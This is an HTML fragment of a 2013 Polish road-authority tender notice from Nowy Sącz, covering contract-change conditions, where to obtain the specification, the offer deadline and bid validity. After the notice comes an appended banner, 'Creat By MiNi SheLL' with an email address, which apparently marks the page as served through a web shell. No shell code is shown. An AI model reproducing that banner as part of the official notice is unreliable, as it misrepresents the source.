c.zmiana danych podmiotowych dotyczących kierownika budowy i robót na osoby o takich samych lub wyższych kwalifikacjach, zmiana danych podmiotowych dotyczących inspektora nadzoru,
d.zmiana podwykonawcy oraz zmiana zakresu zamówienia powierzonego podwykonawcy, jeżeli zmiana będzie korzystna dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzd.nowysacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg
Nowy Sącz ul.Wyspiańskiego 22,III piętro,pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2013 godzina 10:00, miejsce: Miejski Zarząd Dróg
Nowy Sącz ul.Wyspiańskiego 22,III piętro,sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com